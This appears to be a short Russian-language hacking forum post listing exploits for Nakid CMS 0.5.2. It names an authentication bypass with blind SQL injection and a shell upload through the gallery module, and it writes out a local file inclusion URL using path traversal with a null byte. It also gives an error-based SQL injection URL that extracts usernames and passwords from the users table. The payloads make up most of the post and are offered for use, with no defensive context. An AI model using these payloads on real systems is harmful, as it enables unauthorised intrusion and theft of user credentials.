|
Nakid CMS 0.5.2
NakidCMS 0.5.2
Обход Авторизации && Blind SQLi login_process.php mq=off PHP код:
Код:
index.php?p=login_processЗаливка шелла через модуль галереи. |
Local File Inclusion
Vuln file: /index.php Код:
file:/includes/php/first.phpExploit: Код:
http://[host]/[path]/index.php?pt=core&p=../../../../../../../[local_file]%00Vuln file: /includes/pages/users_data.php Код:
/*...*/Код:
http://[host]/[path]/includes/pages/users_data.php?sidx=1+and+(1,2)=(select+*+from(select+name_const((select+concat_ws(0x3a,username,password)+from+nakid_users+where+id=1),1),name_const((select+concat_ws(0x3a,username,password)+from+nakid_users+where+id=1),1))x) |
слив РОА
|
| Время: 13:13 |